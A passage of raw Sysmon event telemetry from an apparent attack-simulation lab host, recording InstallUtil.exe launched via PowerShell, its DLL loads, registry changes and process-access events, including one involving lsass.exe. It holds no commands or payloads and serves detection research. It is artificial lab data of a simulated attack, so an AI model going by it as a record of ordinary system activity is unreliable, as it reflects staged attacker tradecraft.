14:22:51.378{8B6011A9-886B-6164-0B00-00000000F101}6489732C:\Windows\system32\lsass.exe{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057457682Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.378{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 12241200x800000000000000057457681Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 14:22:51.378{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 734700x800000000000000057457680Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.378{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057457679Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.378{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x800000000000000057457678Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.378{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 734700x800000000000000057457677Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.378{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057457676Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.378{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 734700x800000000000000057457675Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.363{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\bcacaaa795f281ac827a1af051d3a051\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=DF0A266E1C073131336B9597E2543820,SHA256=F1079A19E1C6E19EB1A2BA701A3919A0A0474EDFA579D8F3EC05965ECDF5F6FDfalse-Unavailable 734700x800000000000000057457674Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.363{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=C928B5301D291782935A1342A01F6125,SHA256=945ACD65BDCE2291C3C2D15FD910F6E331570D516D386C53FDFB5EC38BE69125false-Unavailable 734700x800000000000000057457673Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.363{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=0745D9F1BAC58E47CC87656768304313,SHA256=BBA1936354A9EF269B283FE706A74B73BE39CAF4DD57AB0D1CD06A1C75E260A2trueMicrosoft CorporationValid 734700x800000000000000057457672Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.363{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057457671Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.363{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\474c5d5d840d0a8b1974061ff11f02c2\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=9955B914F307F0142D003E93A3A500BE,SHA256=1247284354586C375597AD8046AAC7F983BAAC74B545B674FB12DB4BAC5C6C01trueMicrosoft CorporationValid 734700x800000000000000057457670Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.363{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=1AF6CD8B7CE4A852F67AA98C71AA1D26,SHA256=EF0DE008500A8C9C7908383AF11AE55845EBBE28C96C013EA720950BA89D3D28trueMicrosoft WindowsValid 734700x800000000000000057457669Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.363{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 734700x800000000000000057457668Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.363{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 13241300x800000000000000057457667Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:51.363{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeQWORD (0x01d7d7d0-0xc677d37d) 734700x800000000000000057457665Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.363{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=1AF77AF533C702978D4C91C31DB1CCE5,SHA256=39AB2B2B034E3210D866FCF8649EB84C28E3DAB7CB7FA7C986346C6A9ED22D0AtrueMicrosoft CorporationValid 734700x800000000000000057457664Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.363{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057457663Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.363{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057457662Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057457661Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057457660Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057457659Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057457658Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057457657Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057457656Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057457655Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057457654Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057457653Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 734700x800000000000000057457652Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057457651Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057457650Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057457649Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057457648Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057457647Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057457646Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057457645Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 734700x800000000000000057457644Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057457643Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71trueMicrosoft CorporationValid 10341000x800000000000000057457642Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.347{8B6011A9-78BA-618E-2DF7-04000000F101}1563552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c01f5|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45fb9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+456aaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b379(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a2d74(wow64) 10341000x800000000000000057457641Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 